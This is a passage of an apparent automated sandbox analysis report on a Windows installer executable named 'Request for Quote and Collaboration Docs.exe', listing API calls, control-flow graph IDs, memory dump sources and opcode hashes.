                                                                                          • Opcode Fuzzy Hash: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                          • Instruction Fuzzy Hash: 7831BF799043459AFB10DF74DCC5BDA37E8EB043D4F058529F90AAA08EDF74A985C760

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 860 403062-403070 861 403072-403088 SetFilePointer 860->861 862 40308e-403097 call 40317d 860->862 861->862 865 403177-40317a 862->865 866 40309d-4030b0 call 405bd9 862->866 869 403163 866->869 870 4030b6-4030ca call 40317d 866->870 872 403165-403166 869->872 870->865 874 4030d0-4030d3 870->874 872->865 875 4030d5-4030d8 874->875 876 40313f-403145 874->876 879 403174 875->879 880 4030de 875->880 877 403147 876->877 878 40314a-403161 ReadFile 876->878 877->878 878->869 881 403168-403171 878->881 879->865 882 4030e3-4030ed 880->882 881->879 883 4030f4-403106 call 405bd9 882->883 884 4030ef 882->884 883->869 887 403108-40311d WriteFile 883->887 884->883 888 40313b-40313d 887->888 889 40311f-403122 887->889 888->872 889->888 890 403124-403137 889->890 890->882 891 403139 890->891 891->879
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                          • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$PointerWrite
                                                                                          • String ID: x>A
                                                                                          • API String ID: 539440098-3854404225
                                                                                          • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                          • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                          • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                          • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 892 405b85-405b91 893 405b92-405bc6 GetTickCount GetTempFileNameW 892->893 894 405bd5-405bd7 893->894 895 405bc8-405bca 893->895 897 405bcf-405bd2 894->897 895->893 896 405bcc 895->896 896->897
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountFileNameTempTick
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                          • API String ID: 1716503409-2113348990
                                                                                          • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                          • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                          • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                          • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                          APIs
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                            • Part of subcall function 00405665: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                            • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 3585118688-0
                                                                                          • Opcode ID: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
                                                                                          • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                          • Opcode Fuzzy Hash: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
                                                                                          • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                          APIs
                                                                                          • IsWindowVisible.USER32(?), ref: 00405137
                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                            • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                          • String ID:
                                                                                          • API String ID: 3748168415-3916222277
                                                                                          • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                          • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                          • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                          • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                          • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                          Strings
                                                                                          • Error launching installer, xrefs: 00405678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateHandleProcess
                                                                                          • String ID: Error launching installer
                                                                                          • API String ID: 3712363035-66219284
                                                                                          • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                          • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                          • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                          • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                          APIs
                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061E1
                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061F5
                                                                                            • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 00406208
                                                                                          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 00403347
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                          • API String ID: 4115351271-3283962145
                                                                                          • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                          • Instruction ID: 15e16a0f1bb74d2da72680a3c6f5190242cf739030cfb371398593c950d8801c
                                                                                          • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                          • Instruction Fuzzy Hash: 65D0C92250693171C55236663E06FCF166C8F4A32AF129077F805B90D6DB7C2A8245FE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                          • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                          • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                          • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                          • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                          • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                          • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                          • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                          • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                          • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                          • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                          • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                          • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                          • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                          • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                          • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
